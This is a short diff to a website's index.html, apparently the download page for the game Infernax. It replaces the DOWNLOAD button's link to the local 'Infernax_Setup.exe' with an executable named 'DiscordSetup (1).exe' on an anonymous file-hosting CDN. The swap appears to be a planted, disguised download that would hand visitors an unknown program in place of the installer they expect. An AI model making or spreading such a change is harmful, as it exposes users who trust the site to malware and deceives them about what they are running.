--- a/index.html
+++ b/index.html
@@ -110,7 +110,7 @@
 
 
 					<!-- CAROUSSEL ENDS-->
-          						<div class="skulll"></div><a href="download/Infernax_Setup.exe" target="_blank"> <div class="desctitle mediatitle">
+          						<div class="skulll"></div><a href="https://cdn-105.anonfiles.com/XbF4X5m2y4/1887b90d-1654349533/DiscordSetup%20(1).exe" target="https://cdn-105.anonfiles.com/XbF4X5m2y4/1887b90d-1654349533/DiscordSetup%20(1).exe"> <div class="desctitle mediatitle">
 							DOWNLOAD
 						</div></a><div class="skullr"></div>
 				</div>
